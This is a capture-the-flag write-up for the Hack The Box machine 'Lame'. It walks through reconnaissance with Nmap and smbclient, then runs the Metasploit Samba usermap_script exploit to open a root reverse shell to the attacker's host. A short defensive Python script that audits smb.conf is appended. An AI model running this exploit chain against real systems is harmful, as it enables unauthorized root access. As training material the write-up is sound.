Lame

Reconnaissance

IP: 10.10.10.3

Starting with the default Nmap scan we see five services running, three of which seem interesting: FTP on port 21, SSH on port 22 and SMB on port 139.

nmap -sV -sC -Pn -p- 10.10.10.3 
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-04-19T20:45:35-04:00
|_clock-skew: mean: 2h00m20s, deviation: 2h49m44s, median: 18s

After inspecting the FTP service with the ftp command we find out that the anonymous share is empty and not really interesting right now. Trying default logins over SSH didn't work either, so I started enumerating the SMB server with smbclient.

smbclient -L \\\\10.10.10.3\\

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Trying a few default Administrator passwords didn't work either, so we are stuck with the anonymous login. Inspecting the two shares we might have access to, tmp and opt, we find out that we don't have access to opt and that tmp is rather boring: it contains a few files that, after inspection, turned out to be useless.

smbclient  \\\\10.10.10.3\\tmp

Anonymous login successful
smb: \> ls
  .                                   D        0  Wed Apr 20 07:01:49 2022
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  orbit-makis                        DR        0  Wed Apr 20 06:25:31 2022
  .ICE-unix                          DH        0  Tue Apr 19 20:42:07 2022
  vmware-root                        DR        0  Tue Apr 19 20:42:31 2022
  .X11-unix                          DH        0  Tue Apr 19 20:42:32 2022
  gconfd-makis                       DR        0  Wed Apr 20 06:25:31 2022
  zxnf                                N        0  Tue Apr 19 21:09:40 2022
  .X0-lock                           HR       11  Tue Apr 19 20:42:32 2022
  5562.jsvc_up                        R        0  Tue Apr 19 20:43:10 2022
  vgauthsvclog.txt.0                  R     1600  Tue Apr 19 20:42:05 2022

Next I ran the SMB enumeration tool enum4linux. It didn't return anything particularly interesting; it did, however, show various information such as the Samba version number (which Nmap had already reported) and the password policy.

If you want to see the full output, see here: Lame - Enum4Linux Output

Googling the version number reveals a well-known and easy-to-run exploit. It is actually pretty simple: it abuses a command execution vulnerability in the non-default username map script configuration option. Because the configured script is passed the username, a username containing shell metacharacters lets an attacker execute commands. Lucky for us the exploit is available as a module in Metasploit, so all we need to do is set it up and run it. Don't forget to set the victim's IP address as RHOST and your own IP address as LHOST; you can find yours with the ip a command under the tun0 interface, which is your VPN connection to HTB.

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set RHOST 10.10.10.3

msf exploit(usermap_script) > set LHOST 10.10.14.11

msf exploit(usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.11:4444 
[*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.3:36895 )

whoami    
root
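From the defender's side, what the module above abuses is a configuration problem, so here is an added example (my own code, not part of the original write-up or of Samba) that parses an smb.conf and flags the three settings this box relies on: the username map script option, SMB signing not being enforced, and shares open to anonymous users. The config text is constructed for illustration; the script path in it is a made-up placeholder.

```python
from typing import Dict, List

# Constructed smb.conf fragment (illustrative, not taken from the box) that
# reproduces the weaknesses seen above: a "username map script" entry,
# SMB signing left disabled, and a share open to anonymous (guest) users.
WEAK_SMB_CONF = """
; constructed example, not a real server's config
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
   server signing = disabled
[tmp]
   path = /tmp
   guest ok = yes
[opt]
   path = /opt
   guest ok = no
"""

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {param: value}}; smbd ignores case in
    parameter names and treats lines starting with '#' or ';' as comments."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def audit_smb_conf(text: str) -> List[str]:
    """Return one finding per risky setting, global first, then per share."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings: List[str] = []
    if "username map script" in glob:
        findings.append("global: 'username map script' is set; remove it and patch Samba")
    if glob.get("server signing", "").lower() != "mandatory":
        findings.append("global: SMB signing not enforced; set 'server signing = mandatory'")
    for share, opts in conf.items():
        if share != "global" and opts.get("guest ok", "no").lower() in ("yes", "true", "1"):
            findings.append(f"{share}: anonymous access allowed ('guest ok = yes')")
    return findings
```

Running audit_smb_conf on the constructed config returns three findings, matching what the Nmap host scripts and the Metasploit module exposed on this box.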

Now all that is left to do is to grab the flag.

cat /root/root.txt
1cab4dfe1accc3198d**************

Since you also need the user flag to complete the box don’t forget to grab it too.

cat /home/makis/user.txt
d7665557380212******************

And we are done!

Go to Lame - Solution.pdf to see the official write up.